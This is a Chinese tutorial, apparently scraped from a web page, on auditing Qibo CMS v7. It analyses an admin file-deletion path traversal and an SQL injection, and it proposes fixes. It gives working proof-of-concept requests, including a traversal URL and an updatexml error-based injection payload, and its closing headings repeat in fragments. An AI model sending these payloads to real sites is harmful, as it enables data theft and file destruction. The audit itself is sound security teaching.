齐博CMSv7安全审计与漏洞分析教学文档<\/h1>

1. 系统初步了解<\/h2>

1.1 数据库操作类<\/h3>
核心数据库操作类为 $db<\/code><\/li>
类方法定义在 inc\/mysql_class.php<\/code> 的 MYSQL_DB<\/code> 类中<\/li>
系统核心函数与类文件存放在 inc<\/code> 目录下<\/li>
<\/ul>
1.2 过滤函数分析<\/h3>
系统存在一个基础的过滤函数 filtrate()<\/code>，但实现不完善：<\/p>
function<\/span> filtrate<\/span>($msg){
<\/span><\/span>    $msg =<\/span> str_replace<\/span>("<\/span>\t<\/span>"<\/span>," "<\/span>,$msg);
<\/span><\/span>    \/\/ 其他替换操作被注释或无效
<\/span><\/span><\/span><\/span>    return<\/span> $msg;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>该函数过滤不严格，存在安全隐患。<\/p>
2. 后台任意文件删除漏洞<\/h2>
2.1 漏洞定位<\/h3>

搜索关键函数：在inc<\/code>目录下全局搜索unlink<\/code><\/li>
定位到文件：inc\/function.inc.php<\/code><\/li>
问题函数：del_file<\/code><\/li>
<\/ul>
2.2 漏洞代码分析<\/h3>
function<\/span> del_file<\/span>($path){
<\/span><\/span>    if<\/span> (file_exists<\/span>($path)){
<\/span><\/span>        if<\/span>(is_file<\/span>($path)){
<\/span><\/span>            if<\/span>( !@<\/span>unlink<\/span>($path) ){
<\/span><\/span>                $show.=<\/span>"<\/span>$path<\/span>,"<\/span>;
<\/span><\/span>            }
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            \/\/ 目录处理逻辑
<\/span><\/span><\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>该函数直接对$path<\/code>参数进行文件删除操作，未进行任何路径过滤。<\/p>
2.3 漏洞触发点<\/h3>
文件：admin\/mysql.php<\/code><\/p>
elseif<\/span>($action==<\/span>'del'<\/span>&&<\/span>$Apower[mysql_del<\/span>]){
<\/span><\/span>    if<\/span>(!<\/span>$baktime){ showmsg<\/span>('请选择一个'<\/span>); }
<\/span><\/span>    del_file<\/span>(ROOT_PATH<\/span>.<\/span>"cache\/mysql_bak\/<\/span>$baktime<\/span>"<\/span>);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过控制$baktime<\/code>参数，可进行目录穿越攻击。<\/p>
2.4 漏洞利用方法<\/h3>

首先备份数据库文件（位于\cache\mysql_bak<\/code>）<\/li>
删除备份时修改baktime<\/code>参数为..\/hack<\/code><\/li>
实际删除路径变为：ROOT_PATH."cache\/mysql_bak\/..\/hack"<\/code>，即ROOT_PATH."hack"<\/code><\/li>
<\/ol>
2.5 漏洞验证<\/h3>
构造请求：<\/p>
\/admin\/index.php?lfj=mysql&job=del&baktime=..\/target_file
<\/code><\/pre>
3. 后台SQL注入漏洞<\/h2>
3.1 漏洞位置<\/h3>
文件：admin\/html.php<\/code> 第296行处<\/p>
3.2 漏洞代码分析<\/h3>
if<\/span>($fiddb){
<\/span><\/span>    $stringFID=<\/span>implode<\/span>(","<\/span>,$fiddb);
<\/span><\/span>    $SQL=<\/span>" fid IN (<\/span>$stringFID<\/span>) "<\/span>;
<\/span><\/span>}elseif<\/span>($idDB){
<\/span><\/span>    $string=<\/span>implode<\/span>(","<\/span>,$idDB);
<\/span><\/span>    $SQL=<\/span>" id IN (<\/span>$string<\/span>) "<\/span>;
<\/span><\/span>}
<\/span><\/span>$query =<\/span> $db-><\/span>query<\/span>("SELECT id,fid FROM <\/span>{<\/span>$pre}<\/span>special WHERE <\/span>$SQL<\/span> LIMIT 3000"<\/span>);
<\/span><\/span><\/code><\/pre>
$idDB<\/code>和$fiddb<\/code>都从GET传入<\/li>
直接拼接SQL语句，无任何过滤<\/li>
使用implode<\/code>函数需要传入数组参数<\/li>
<\/ul>
3.3 漏洞利用条件<\/h3>

需要传入action=make_SPhtml<\/code>进入漏洞代码段<\/li>
lfj<\/code>参数需为html<\/code><\/li>
idDB<\/code>或fiddb<\/code>需为数组形式<\/li>
<\/ul>
3.4 漏洞验证POC<\/h3>
使用Burp Suite构造请求：<\/p>
\/admin\/index.php?lfj=html&action=make_SPhtml&idDB[]=1)+and+(updatexml(1,concat(0x7e,(select+user()),0x7e),1))%23
<\/code><\/pre>
注意：<\/p>

需要将idDB<\/code>作为数组传递（使用[]<\/code>）<\/li>
需要URL编码特殊字符（如#<\/code>编码为%23<\/code>）<\/li>
使用+<\/code>代替空格绕过某些过滤<\/li>
<\/ol>
4. 漏洞修复建议<\/h2>
4.1 任意文件删除漏洞修复<\/h3>

在del_file<\/code>函数中添加路径验证：<\/li>
<\/ol>
function<\/span> del_file<\/span>($path){
<\/span><\/span>    \/\/ 验证路径是否在允许范围内
<\/span><\/span><\/span><\/span>    $allowed_path =<\/span> ROOT_PATH<\/span>.<\/span>"cache\/mysql_bak\/"<\/span>;
<\/span><\/span>    if<\/span>(strpos<\/span>(realpath<\/span>($path), realpath<\/span>($allowed_path)) !==<\/span> 0<\/span>){
<\/span><\/span>        die<\/span>("非法路径"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    \/\/ 原有逻辑
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>
在调用处添加过滤：<\/li>
<\/ol>
$baktime =<\/span> basename<\/span>($baktime); \/\/ 只保留文件名部分
<\/span><\/span><\/span><\/span>del_file<\/span>(ROOT_PATH<\/span>.<\/span>"cache\/mysql_bak\/"<\/span>.<\/span>$baktime);
<\/span><\/span><\/code><\/pre>4.2 SQL注入漏洞修复<\/h3>

使用预处理语句：<\/li>
<\/ol>
if<\/span>($idDB){
<\/span><\/span>    $placeholders =<\/span> rtrim<\/span>(str_repeat<\/span>('?,'<\/span>, count<\/span>($idDB)), ','<\/span>);
<\/span><\/span>    $SQL =<\/span> " id IN (<\/span>$placeholders<\/span>) "<\/span>;
<\/span><\/span>    $query =<\/span> $db-><\/span>prepare<\/span>("SELECT id,fid FROM <\/span>{<\/span>$pre}<\/span>special WHERE <\/span>$SQL<\/span> LIMIT 3000"<\/span>);
<\/span><\/span>    $query-><\/span>execute<\/span>($idDB);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
至少添加基础过滤：<\/li>
<\/ol>
$idDB =<\/span> array_map<\/span>('intval'<\/span>, $idDB); \/\/ 强制转为整数
<\/span><\/span><\/span><\/span>$string =<\/span> implode<\/span>(","<\/span>, $idDB);
<\/span><\/span><\/code><\/pre>5. 审计方法论总结<\/h2>

敏感函数追踪<\/strong>：全局搜索unlink<\/code>、eval<\/code>、system<\/code>等危险函数<\/li>
参数传递分析<\/strong>：跟踪用户输入从获取到使用的完整流程<\/li>
过滤函数评估<\/strong>：检查系统过滤机制是否完善<\/li>
权限验证检查<\/strong>：确认漏洞点是否受权限控制<\/li>
利用条件分析<\/strong>：确定漏洞触发的前置条件<\/li>
<\/ol>
6. 扩展思考<\/h2>

后台漏洞的价值评估：虽然需要后台权限，但可能通过XSS或CSRF间接利用<\/li>
漏洞组合利用的可能性：如结合文件删除和文件上传实现更严重攻击<\/li>
自动化审计工具的应用：可使用静态分析工具辅助发现类似漏洞模式<\/li>
<\/ol>
齐博CMSv7安全审计与漏洞分析教学文档<\/h1>

1. 系统初步了解<\/h2>

2. 后台任意文件删除漏洞<\/h2>

3. 后台SQL注入漏洞<\/h2>

3.1 漏洞位置<\/h3> 文件：admin\/html.php<\/code> 第296行处<\/p>

4. 漏洞修复建议<\/h2>

3.1 漏洞位置<\/h3>
文件：`admin\/html.php<\/code> 第296行处<\/p>`
